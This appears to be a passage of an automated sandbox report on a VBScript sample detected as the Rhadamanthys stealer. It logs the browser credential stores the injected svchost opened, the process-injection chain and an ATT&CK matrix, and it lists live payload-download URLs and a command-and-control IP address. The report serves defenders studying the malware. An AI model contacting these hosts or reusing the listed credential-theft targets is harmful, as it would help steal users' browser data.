                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6F59B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,12_3_00007DF45B6F59B0
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 0000000B.00000003.2013624031.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2008744102.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2104903369.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2020607933.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtabJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\defJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsingJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomedJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browserJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\startupCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfakJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\thumbnailsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ProfilesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\safebrowsing\google4Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\trash16598Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entriesJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmiedaJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2Jump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dirJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjfJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\mainJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packsJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
                        Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior

                        Remote Access Functionality

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 0000000B.00000003.2013624031.00000000007A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2008744102.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2104903369.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2020607933.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\System32\svchost.exeCode function: 12_3_00007DF45B6F59B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,12_3_00007DF45B6F59B0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 16_2_000002614EFDD004 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,16_2_000002614EFDD004

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information221
                        Scripting                        		Valid Accounts111
                        Windows Management Instrumentation                        		221
                        Scripting                        		1
                        DLL Side-Loading                        		3
                        Obfuscated Files or Information                        		1
                        OS Credential Dumping                        		13
                        File and Directory Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		1
                        Extra Window Memory Injection                        		2
                        Software Packing                        		21
                        Input Capture                        		224
                        System Information Discovery                        		Remote Desktop Protocol11
                        Data from Local System                        		21
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		1
                        Create Account                        		512
                        Process Injection                        		1
                        DLL Side-Loading                        		Security Account Manager331
                        Security Software Discovery                        		SMB/Windows Admin Shares21
                        Input Capture                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell                        		Login HookLogin Hook1
                        Extra Window Memory Injection                        		NTDS251
                        Virtualization/Sandbox Evasion                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Masquerading                        		LSA Secrets2
                        Process Discovery                        		SSHKeylogging3
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts251
                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials1
                        Application Window Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items512
                        Process Injection                        		DCSync1
                        System Network Configuration Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569005 Sample: payload_1.vbs Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 53 www.tdejb.com 2->53 55 www.pts.group 2->55 57 8 other IPs or domains 2->57 73 Suricata IDS alerts for network traffic 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 Yara detected RHADAMANTHYS Stealer 2->77 79 6 other signatures 2->79 11 powershell.exe 18 2->11         started        14 wscript.exe 1 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 95 Early bird code injection technique detected 11->95 97 Writes to foreign memory regions 11->97 99 Found suspicious powershell code related to unpacking or dynamic code loading 11->99 107 2 other signatures 11->107 19 msiexec.exe 1 6 11->19         started        23 conhost.exe 11->23         started        101 VBScript performs obfuscated calls to suspicious functions 14->101 103 Suspicious powershell command line found 14->103 105 Wscript starts Powershell (via cmd or directly) 14->105 109 2 other signatures 14->109 25 powershell.exe 14 18 14->25         started        27 WMIC.exe 1 14->27         started        51 127.0.0.1 unknown unknown 16->51 signatures6 process7 dnsIp8 59 tdejb.com 202.71.109.228, 443, 49737 TMVADS-APTM-VADSDCHostingMY Malaysia 19->59 81 Hides threads from debuggers 19->81 83 Switches to a custom stack to bypass stack traces 19->83 29 svchost.exe 19->29         started        61 pts.group 68.66.226.116, 443, 49730 A2HOSTINGUS United States 25->61 85 Found suspicious powershell code related to unpacking or dynamic code loading 25->85 33 conhost.exe 25->33         started        87 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 27->87 35 conhost.exe 27->35         started        signatures9 process10 dnsIp11 71 45.149.241.141, 2023, 443, 49738 UUNETUS Germany 29->71 111 System process connects to network (likely due to code injection or exploit) 29->111 113 Switches to a custom stack to bypass stack traces 29->113 37 svchost.exe 3 29->37         started        signatures12 process13 dnsIp14 63 time-a-g.nist.gov 129.6.15.28, 123, 60802 US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS United States 37->63 65 ntp1.hetzner.de 213.239.239.164, 123, 60802 HETZNER-ASDE Germany 37->65 67 3 other IPs or domains 37->67 89 Tries to harvest and steal browser information (history, passwords, etc) 37->89 41 wmpnscfg.exe 37->41         started        44 chrome.exe 37->44         started        signatures15 process16 dnsIp17 91 Writes to foreign memory regions 41->91 93 Allocates memory in foreign processes 41->93 47 dllhost.exe 41->47         started        69 239.255.255.250 unknown Reserved 44->69 49 chrome.exe 44->49         started        signatures18 process19

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        payload_1.vbs5%ReversingLabs

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        https://45.149.241.141:2023/6d41b386417b9c328d8/hkxh1h5h.v22gl0%Avira URL Cloudsafe
                        https://go.micro0%Avira URL Cloudsafe
                        http://pts.group0%Avira URL Cloudsafe
                        https://www.pts.group0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.binVerisTvewww.tequila.ae/ab/ab.bin0%Avira URL Cloudsafe
                        http://www.microsoft.dN0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.bin0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.binV0%Avira URL Cloudsafe
                        https://www.tdejb.com/0%Avira URL Cloudsafe
                        https://www.puneet.ae/ab/infantrymen.deploy0%Avira URL Cloudsafe
                        https://www.pts.group/ab/infantrymen.deploy0%Avira URL Cloudsafe
                        http://www.pts.group0%Avira URL Cloudsafe
                        https://www.puneet.ae/ab/infantrymen.deployt0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        time.cloudflare.com
                        		162.159.200.123
                        		truefalse
                          		high
                          time.google.com
                          		216.239.35.0
                          		truefalse
                            		high
                            pts.group
                            		68.66.226.116
                            		truefalse
                              		unknown
                              tdejb.com
                              		202.71.109.228
                              		truefalse
                                		unknown
                                ntp.time.in.ua
                                		62.149.0.30
                                		truefalse
                                  		high
                                  time-a-g.nist.gov
                                  		129.6.15.28
                                  		truefalse
                                    		high
                                    ntp1.hetzner.de
                                    		213.239.239.164
                                    		truefalse
                                      		unknown
                                      www.pts.group
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        ts1.aco.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.tdejb.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            https://www.tdejb.com/ab/ab.binfalse
